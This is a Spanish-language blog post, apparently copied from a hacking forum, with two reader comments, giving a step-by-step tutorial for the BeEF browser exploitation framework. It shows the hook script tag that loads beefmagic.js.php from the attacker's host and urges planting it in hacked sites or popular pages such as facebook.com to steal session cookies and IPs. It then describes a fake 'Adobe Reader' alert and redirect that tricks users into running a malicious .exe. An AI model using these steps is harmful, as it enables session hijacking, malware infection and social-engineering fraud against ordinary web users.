Bueno, hace algún tiempo publique información sobre BeEF: [BeEFYPROXY] Interceptar el trafico WEB (MITM) ahora les traigo un tutorial que encontré y que es bastante bueno, lo recomiendo 100%:
INICIEMOS
1- Descargamos BeEF de Su pagina oficial
http://www.bindshell.net/tools/beef/
2- Desempaquetamos.....
3-En un Hosting montamos los Archivos...Cuando acabemos vamos a la GUI:
¿Una Vez Montado como saber si funciona?
Simple Nos Ponemos en la GUI :D
Y vamos al MENU VIEW Y ELEGIMOS LA 1 OPCIÓN
Este Nos Brindara una ventana de EXAMPLE O PRUEBA si vemos que Al cabo de unos Segundos Conecta...
Quiere decir que Nuestro BeEF esta Listo :D!!!
¿COMO USARLO?
Bueno vamos al menú que Nombre anteriormente VIEW/Spawn Zombie Example
Nos saldrá esta pag:
Dicho código es un ARCHIVO SCRIPT que se encuentra en los archivos que nosotros subimos con el BEEF!
<script language='Javascript' src="http:// /beef/hook/beefmagic.js.php'></script>
Ese Code Hay que Meterlo en el Body de las Páginas.. Su función sería crear un Puente...Se preguntan en que Páginas¿?... en las que Quieran...!!! EJEMPLO!... si logran meter el SCRIPT CODE en alguna pagina con usuarios EJEMPLO: facebook.com XD podrías robar SESIONES COOKIES.. Ademas Podrías meterlo en varias webs FAMOSAS CON MUCHA VISITAS y a los users los Rediriges a un EXE y así Podrías tener un Malware Infeccion
Mentiendo el Code en un INDEX de un Hacked HOST!
Este Code hará una simulación de quw la web esta Cargando... y A la vez Conecta al BEEF CLIENT.
En Nuestro Client BEEF Veríamos esto....
1 ZOMBIE A CONECTADO :D
- Podriamos Robar Cookies
- Sacar IPS
- Enviar Alerts!
- Java Applet!
- Entre otras Funciones.....
1- VISTA DESDE EL CLIENT MANAGER
2-VISTA DESDE LA WEB Q RECIBE
Haciendo redireccion a Archivo Exe Mediante ING SOCIAL!
1- Enviamos AlerT al usuario con algo q haga descarga
EJEMPLO: "Para Ver la Página Necesita tener Adobe reader 3"
El usuario dira Bueno lo Descargo de una....
2- Le hacemos un redirect a Un Archivo.exe Simulando ser el Adobe Reader 3
a- Vamos a NETWORK MODULES/ BROWSER REDIRECT
b- Ingresamos el enlace con el .exe MALICIOSO
c- Al abrirse el usuario creera q es el ADOBE q se le pidio anteriormente... y PFF
Fuente: http://maztor.diosdelared.com/
[+] Salu2
Wauuu Siempre este Tio aportando Cosas Impactantes y muy buenas... Excelente tuto !
ResponderEliminarsera que eso serviria de XSSshell¿?
ResponderEliminar